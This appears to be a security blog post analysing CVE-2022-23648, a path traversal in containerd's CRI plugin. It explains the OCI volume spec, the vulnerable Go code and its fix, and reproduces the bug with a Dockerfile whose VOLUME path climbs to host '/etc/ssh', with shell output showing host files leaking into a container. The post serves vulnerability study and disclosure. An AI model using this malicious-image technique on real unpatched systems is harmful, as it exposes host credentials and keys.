2022-03-26

The spec

Path traversal is a classical kind of security issue in computer world. This is logical issue so even with the rapid development of technology, this kind of issue still appear in software. This post try to analysis a path traversal issue in containerd which is discovered by Felix Wilhelm. The first part let’s try to explain the related spec so that we can know what the function is and what the violation the implementation has.

Container has a concept of volume. If a container has no volume, the data we changed in container will disappear after the container is destroyed. In order to save data persistently or share data between containers, container came up with the concept of volume. A volume is often(if not all) implemented using bind mount. We can use -v in docker to add a volume.

            root@ubuntu:/home/test/CVE-2022-23648# mkdir test
            root@ubuntu:/home/test/CVE-2022-23648# echo "data in host" > test/aaa
            root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm  -v /home/test/CVE-2022-23648/test:/test ubuntu bash
            root@c201b6a39be2:/# mount | grep test
            /dev/sda5 on /test type ext4 (rw,relatime,errors=remount-ro)
            root@ecc59c1f5bc4:/# ls /test/
            aaa
            root@ecc59c1f5bc4:/# cat /test/aaa 
            data in host
            root@ecc59c1f5bc4:/# echo "data in guest" >> /test/aaa
            root@ecc59c1f5bc4:/# exit
            exit
            root@ubuntu:/home/test/CVE-2022-23648# cat test/aaa 
            data in host
            data in guest

‘docker inspect containerid’ in the host will show the data in “Mounts”.

            "Mounts": [
            {
                    "Type": "bind",
                    "Source": "/home/test/CVE-2022-23648/test",
                    "Destination": "/test",
                    "Mode": "",
                    "RW": true,
                    "Propagation": "rprivate"
            }
            ],

The OCI image spec also has a field named ‘Volumes’. The definition says it is ‘A set of directories describing where the process is likely to write data specific to a container instance’.

Let’s try to test this feature. First create a Dockerfile.

            from ubuntu:20.04

            VOLUME /volume-test/

Build it and start a container. We can see there is a mount in the container.

            root@ubuntu:/home/test/CVE-2022-23648# docker build -t volume-test .
            Sending build context to Docker daemon  3.584kB
            Step 1/2 : from ubuntu:20.04
            ---> ff0fea8310f3
            Step 2/2 : VOLUME /volume-test/
            ---> Running in 2b744c0f90ff
            Removing intermediate container 2b744c0f90ff
            ---> 1cf01e39ec82
            Successfully built 1cf01e39ec82
            Successfully tagged volume-test:latest
            root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm volume-test bash
            root@a301238d982c:/# ls -lh /volume-test/
            total 0
            root@a301238d982c:/# mount | grep volume     
            /dev/sda5 on /volume-test type ext4 (rw,relatime,errors=remount-ro)

The ‘docker inspect’ shows the mount inforamtion as following.

            "Mounts": [
            {
                    "Type": "volume",
                    "Name": "e05d07c283a443133ba5635dfe13d2241a68087e96c47e5521febe9f7eb5bd98",
                    "Source": "/var/lib/docker/volumes/e05d07c283a443133ba5635dfe13d2241a68087e96c47e5521febe9f7eb5bd98/_data",
                    "Destination": "/volume-test",
                    "Driver": "local",
                    "Mode": "",
                    "RW": true,
                    "Propagation": ""
            }
            ],

The ‘docker image inspect’ show the following info:

            "Volumes": {
                    "/volume-test/": {}
            },

As we can see the ‘Source’ is generated by the runtime ifself and the ‘Destination’ is the name of VOLUME.

As Felix points out When this configuration is converted into an OCI runtime configuration, containerd tries to follow the spec at https://github.com/opencontainers/image-spec/blob/main/conversion.md.

“Implementations SHOULD provide mounts for these locations such that application data is not written to the container’s root filesystem. If a converter implements conversion for this field using mountpoints, it SHOULD set the destination of the mountpoint to the value specified in Config.Volumes. An implementation MAY seed the contents of the mount with data in the image at the same location”

The point here is ‘seed the contents of the mount with data in the image at the same location’. It means if the image has data in the mount directory the implementation should also contains the origin data.

            root@ubuntu:/home/test/CVE-2022-23648# cat Dockerfile 
            from ubuntu:20.04

            RUN mkdir /volume-test
            RUN echo "volume data" > /volume-test/aaa
            VOLUME /volume-test/

            root@ubuntu:/home/test/CVE-2022-23648# docker build -t volume-test1 .
            Sending build context to Docker daemon  3.584kB
            Step 1/4 : from ubuntu:20.04
            ---> ff0fea8310f3
            Step 2/4 : RUN mkdir /volume-test
            ---> Using cache
            ---> a05c3161c55d
            Step 3/4 : RUN echo "volume data" > /volume-test/aaa
            ---> Running in 60702a1547f5
            Removing intermediate container 60702a1547f5
            ---> 4702775454c2
            Step 4/4 : VOLUME /volume-test/
            ---> Running in 14963733faf9
            Removing intermediate container 14963733faf9
            ---> cc3e2700af76
            Successfully built cc3e2700af76
            Successfully tagged volume-test1:latest
            root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm volume-test1 bash
            root@20939034b463:/# mount | grep volume
            /dev/sda5 on /volume-test type ext4 (rw,relatime,errors=remount-ro)
            root@20939034b463:/# ls /volume-test/
            aaa
            root@20939034b463:/# cat /volume-test/aaa 
            volume data

As we can see, the origin data is in the volue. This is mean ‘seed’ the data. If we do more investigation we can see there are two file named ‘aaa’.

            root@ubuntu:/home/test# find /var/lib/ -name aaa
            /var/lib/docker/volumes/ed8dac626f22fe409ff7159aeb1cc59d90f506876ca655fd5896f007bbbfed36/_data/aaa
            /var/lib/docker/overlay2/50c147cecab7d2310c82188c95f3e5711c4e8c096488ba275e143f21afe05123/diff/volume-test/aaa
            /var/lib/docker/overlay2/45535f60b70e7185f78837ccac706cb03f3efcb7e0b01dd409aa1d314d8f857c/merged/volume-test/aaa

The first is the ‘data’ in the volume, the second and third is the same file which in the container image. The first file is copied from the second directory.

Now we know how the ‘VOLUME’ works from OCI image configuration to OCI runtime configuration. In order to seed the data, the converter need to copy the data in the original image to the container’s mount directory.

The vulnerability

The vulnerability occurs in the seed process of containerd. Say if we set the VOLUME to “/../../../../../../../../var/lib/kubelet/pki/”, then the copy process will be:

            copy /var/lib/docker/overlay2/xxx/merged//../../../../../../../../var/lib/kubelet/pki/    /var/lib/docker/volumes/yyy/_data/

The containerd tries to copy the file in image to the volumes. But it doesn’t check the src this src can be controlled in the OCI image configuration.

The ‘volumeMounts’ in ‘cri/server/container_create.go’ create mounts from ‘Volumes’.

            func (c *criService) volumeMounts(containerRootDir string, criMounts []*runtime.Mount, config *imagespec.ImageConfig) []*runtime.Mount {
                    ...
                    var mounts []*runtime.Mount
                    for dst := range config.Volumes {
                            ...
                            volumeID := util.GenerateID()
                            src := filepath.Join(containerRootDir, "volumes", volumeID)
                            // addOCIBindMounts will create these volumes.
                            mounts = append(mounts, &runtime.Mount{
                                    ContainerPath:  dst,
                                    HostPath:       src,
                                    SelinuxRelabel: true,
                            })
                    }
                    return mounts
            }

The ‘ContainerPath’ can be the malicious path.

Later in the same function the ‘HostPath’ is cleaned, but the ‘ContainerPath’ is not.

            if len(volumeMounts) > 0 {
                    mountMap := make(map[string]string)
                    for _, v := range volumeMounts {
                            mountMap[filepath.Clean(v.HostPath)] = v.ContainerPath
                    }
                    opts = append(opts, customopts.WithVolumes(mountMap))
            }

Finally in ‘WithVolumes’ in ‘pkg/cri/opts/container.go’.

	for host, volume := range volumeMounts {
		// The volume may have been defined with a C: prefix, which we can't use here.
		volume = strings.TrimPrefix(volume, "C:")
		for _, mountPath := range mountPaths {
			src := filepath.Join(mountPath, volume)
			if _, err := os.Stat(src); err != nil {
				if os.IsNotExist(err) {
					// Skip copying directory if it does not exist.
					continue
				}
				return fmt.Errorf("stat volume in rootfs: %w", err)
			}
			if err := copyExistingContents(src, host); err != nil {
				return fmt.Errorf("taking runtime copy of volume: %w", err)
			}
		}
	}

Here the ‘mountPath’ is the host directory pointing to a part of the container rootfs, ‘volume’ is the malicious path, ‘host’ is the host directory that will be mount in the container. The ‘src’ of ‘copyExistingContents’ parameter will like ‘/xxx/xx/../../../../../../../../../etc’, and becomes ‘/etc/’ and this in the host filesystem. So ‘copyExistingContents’ will copy the host filesystem data to the container.

The fix is in this commit.

            @@ -112,7 +112,10 @@ func WithVolumes(volumeMounts map[string]string) containerd.NewContainerOpts {
                                    // The volume may have been defined with a C: prefix, which we can't use here.
                                    volume = strings.TrimPrefix(volume, "C:")
                                    for _, mountPath := range mountPaths {
            -				src := filepath.Join(mountPath, volume)
            +				src, err := fs.RootPath(mountPath, volume)
            +				if err != nil {
            +					return fmt.Errorf("rootpath on mountPath %s, volume %s: %w", mountPath, volume, err)
            +				}
                                            if _, err := os.Stat(src); err != nil {
                                                    if os.IsNotExist(err) {
                                                            // Skip copying directory if it does not exist.

It just uses the ‘fs.RootPath’ to replace ‘filepath.Join’. The ‘fs.RootPath’ will evaluate and bound any symlink in ‘volume’ to the root directory.

Reproduce

The vulnerability itself is easy to understand. I failed when I tried to use the docker or ctr to reproduce this issue. Fu wei, a containerd maintainer, tells me I should use crictl to reproduce this as the vulnerability code is shipped in the CRI plugin of containerd. This part is mostly about how to setup the crictl environment. In the process I asked a lot from Bonan and Fu wei, thanks! The setup process is mostly from this post

Download crictl and set the environment

In the cri-tools release page we download a v1.23.0 version.

            root@ubuntu:/home/test# tar -xzvf crictl-v1.23.0-linux-amd64.tar.gz -C /usr/bin
            crictl
            root@ubuntu:/home/test# crictl  --version
            crictl version v1.23.0

Create a new file in /etc/crictl.yaml and add the following configuration.

            runtime-endpoint: unix:///var/run/containerd/containerd.sock
            image-endpoint: unix:///var/run/containerd/containerd.sock
            timeout: 10
            debug: false

Create the containerd config file /etc/containerd/config.toml

            root@ubuntu:/home/test# mkdir /etc/containerd
            root@ubuntu:/home/test# vi /etc/containerd/config.toml
            root@ubuntu:/home/test# systemctl  restart containerd
            root@ubuntu:/home/test# cat /etc/containerd/config.toml 
            [plugins]
            [plugins.cri]
            sandbox_image = "rancher/pause:3.1"
            [plugins.cri.cni]
            bin_dir = "/opt/cni/bin"
            conf_dir = "/etc/cni/net.d"
            [plugins.cri.registry]
            [plugins.cri.registry.mirrors]
                    [plugins.cri.registry.mirrors."docker.io"]
                    endpoint = ["https://docker.mirrors.ustc.edu.cn"]
            [plugins.linux]
            shim = "containerd-shim"
            runtime = "runc"
            runtime_root = ""
            no_shim = false
            shim_debug = false

Install cni plugin. Download it from cni plugin page.

            root@ubuntu:/home/test# mkdir -p /opt/cni/bin
            root@ubuntu:/home/test# tar -zxvf cni-plugins-linux-amd64-v1.1.1.tgz  -C /opt/cni/bin
            ./
            ./macvlan
            ./static
            ./vlan
            ./portmap
            ./host-local
            ./vrf
            ./bridge
            ./tuning
            ./firewall
            ./host-device
            ./sbr
            ./loopback
            ./dhcp
            ./ptp
            ./ipvlan
            ./bandwidth
            root@ubuntu:/home/test# vi /etc/cni/net.d/10-mynet.conf
            root@ubuntu:/home/test# vi /etc/cni/net.d/99-loopback.conf
            root@ubuntu:/home/test# cat /etc/cni/net.d/10-mynet.conf
            {
            "cniVersion": "0.2.0",
            "name": "mynet",
            "type": "bridge",
            "bridge": "cni0",
            "isGateway": true,
            "ipMasq": true,
            "ipam": {
                    "type": "host-local",
                    "subnet": "10.22.0.0/16",
                    "routes": [
                    { "dst": "0.0.0.0/0" }
                    ]
            }
            }

            root@ubuntu:/home/test# cat /etc/cni/net.d/99-loopback.conf
            {
            "cniVersion": "0.2.0",
            "name": "lo",
            "type": "loopback"
            }

Create container and trigger vulnerability

  • Pull the pause image

              root@ubuntu:/home/test# crictl  pull registry.aliyuncs.com/google_containers/pause:3.6
              Image is up to date for sha256:6270bb605e12e581514ada5fd5b3216f727db55dc87d5889c790e4c760683fee
              root@ubuntu:/home/test# crictl image
              IMAGE                                           TAG                 IMAGE ID            SIZE
              registry.aliyuncs.com/google_containers/pause   3.6                 6270bb605e12e       302kB
              root@ubuntu:/home/test# ctr -n k8s.io image tag registry.aliyuncs.com/google_containers/pause:3.6 k8s.gcr.io/pause:3.6
              k8s.gcr.io/pause:3.6
              root@ubuntu:/home/test# crictl  image
              IMAGE                                           TAG                 IMAGE ID            SIZE
              k8s.gcr.io/pause                                3.6                 6270bb605e12e       302kB
              registry.aliyuncs.com/google_containers/pause   3.6                 6270bb605e12e       302kB
    
  • Create the mailicious image

Built it.

            root@ubuntu:/home/test/CVE-2022-23648# echo "host" > /etc/ssh/host_file
            root@ubuntu:/home/test/CVE-2022-23648# vi Dockerfile 
            root@ubuntu:/home/test/CVE-2022-23648# docker build -t cve-2022-23648 .
            Sending build context to Docker daemon  3.584kB
            Step 1/2 : from ubuntu:20.04
            ---> ff0fea8310f3
            Step 2/2 : VOLUME  /../../../../../../../../etc/ssh
            ---> Running in 06720320c1f6
            Removing intermediate container 06720320c1f6
            ---> b253bcd6793c
            Successfully built b253bcd6793c
            Successfully tagged cve-2022-23648:latest
            root@ubuntu:/home/test/CVE-2022-23648# cat Dockerfile 
            from ubuntu:20.04

            VOLUME  /../../../../../../../../etc/ssh

            root@ubuntu:/home/test/CVE-2022-23648# 
  • Import it in containerd

              root@ubuntu:/home/test/CVE-2022-23648# docker save cve-2022-23648 > cve-2022-23648.tar
              root@ubuntu:/home/test/CVE-2022-23648# ctr -n k8s.io image import  cve-2022-23648.tar 
              unpacking docker.io/library/cve-2022-23648:latest (sha256:6280c4ac2a16fb85d1c15d4c43055a32ce226c04bbdb0358c8f0b39d93aa869a)...done
              root@ubuntu:/home/test/CVE-2022-23648# crictl  image 
              IMAGE                                           TAG                 IMAGE ID            SIZE
              docker.io/library/cve-2022-23648                latest              b253bcd6793c2       75.1MB
              k8s.gcr.io/pause                                3.6                 6270bb605e12e       302kB
              registry.aliyuncs.com/google_containers/pause   3.6                 6270bb605e12e       302kB
    
  • Run the malicious image

              root@ubuntu:/home/test/CVE-2022-23648# crictl run --no-pull container-config.json pod-config.json 
              ba2d0c46c5502c2b9bd7027333c3779095d5e297ef165bfe50b863a0fb82d8c2
              root@ubuntu:/home/test/CVE-2022-23648# crictl pods
              POD ID              CREATED             STATE               NAME                NAMESPACE           ATTEMPT             RUNTIME
              3bf95742d0fb3       10 seconds ago      Ready               test                default             1                   (default)
              root@ubuntu:/home/test/CVE-2022-23648# crictl ps
              CONTAINER           IMAGE                                     CREATED             STATE               NAME                ATTEMPT             POD ID
              ba2d0c46c5502       docker.io/library/cve-2022-23648:latest   14 seconds ago      Running             test                0                   3bf95742d0fb3
              root@ubuntu:/home/test/CVE-2022-23648# crictl exec -it ba2d0c46c5502 bash
              root@ubuntu:/# ls /etc/ssh/
              root@ubuntu:/# ls /etc/ssh
    

Emmm, no host data. Wha’t wrong. From this page, we can see my containerd is fixed.

            root@ubuntu:/home/test# containerd --version
            containerd github.com/containerd/containerd 1.5.5-0ubuntu3~20.04.2 
            root@ubuntu:/home/test# which containerd
            /usr/bin/containerd
            root@ubuntu:/home/test# stat /usr/bin/containerd
            File: /usr/bin/containerd
            Size: 60305392  	Blocks: 117784     IO Block: 4096   regular file
            Device: 805h/2053d	Inode: 5769129     Links: 1
            Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
            Access: 2022-03-25 23:43:13.235999616 -0700
            Modify: 2022-02-25 12:15:25.000000000 -0800
            Change: 2022-03-14 06:37:43.871583849 -0700
            Birth: -
  • Install a lower version.

              root@ubuntu:/home/test/CVE-2022-23648# crictl stopp 3bf95742d0fb3
              Stopped sandbox 3bf95742d0fb3
              root@ubuntu:/home/test/CVE-2022-23648# crictl rmp 3bf95742d0fb3
              Removed sandbox 3bf95742d0fb3
              root@ubuntu:/home/test/CVE-2022-23648# crictl pods
              POD ID              CREATED             STATE               NAME                NAMESPACE           ATTEMPT             RUNTIME
              root@ubuntu:/home/test/CVE-2022-23648# crictl ps
              CONTAINER           IMAGE               CREATED             STATE               NAME                ATTEMPT             POD ID
    
    
              root@ubuntu:/home/test/CVE-2022-23648# crictl run --no-pull container-config.json pod-config.json 
              fe4ef77ab8e31434ab73e952c69710634a2cc2ec4a2f072cac45436941e7cc6b
              root@ubuntu:/home/test/CVE-2022-23648# crictl pods
              POD ID              CREATED             STATE               NAME                NAMESPACE           ATTEMPT             RUNTIME
              1ecc6bee60024       4 seconds ago       Ready               test                default             1                   (default)
              root@ubuntu:/home/test/CVE-2022-23648# crictl ps
              CONTAINER           IMAGE                                     CREATED             STATE               NAME                ATTEMPT             POD ID
              fe4ef77ab8e31       docker.io/library/cve-2022-23648:latest   7 seconds ago       Running             test                0                   1ecc6bee60024
              root@ubuntu:/home/test/CVE-2022-23648# crictl exec -it fe4ef77ab8e31 bash
              root@ubuntu:/# ls /etc/ssh
              host_file  ssh_config  ssh_config.d
              root@ubuntu:/# cat /etc/ssh/host_file 
              host
              root@ubuntu:/# exit
              exit
              root@ubuntu:/home/test/CVE-2022-23648# containerd --version
              containerd github.com/containerd/containerd 1.3.3-0ubuntu2 
    

Finally we reproduce this vulnerability.

The end

After reproducing this vulnerability, I want to know why docker and ctr can’t work and discuss a lot with Fu wei. Some the conclusion I made(not sure whether it is 100% accurate):

CRI is the interface between Kubernetes and container runtime. OCI is the spec of how to run a container. So there need some software between the CRI and OCI. This software need to implemenetation CRI interface to Kuberentes and they also need to convert the CRI request to the low level OCI spec and lanuch container. containerd、cri-o is this kind of software. The Kubernetes can also use the docker to run container, But it needs the docker-shim to interacts using CRI interface.

  • containerd. containerd is a container runtime that can be used to manage the container. The containerd not just contain CRI interface, but also some other container management interface.
  • ctr. ctr is the client test tool of containerd, it just not releated with CRI.
  • crictl. crictl is a CLI for CRI-compatible container runtimes. It can interact with CRI runtime to manage container.
  • docker. docker is not related CRI, just another container management.

As the vulnerability is in the CRI plugin of containerd, we can only trigger it in the CRI path. In this post I use the crictl to trigger it. It can be also triggered in the Kubernetes which uses the containerd as the CRI runtime.

reference

containerd: Insecure handling of image volumes

使用containerd单独创建容器



blog comments powered by Disqus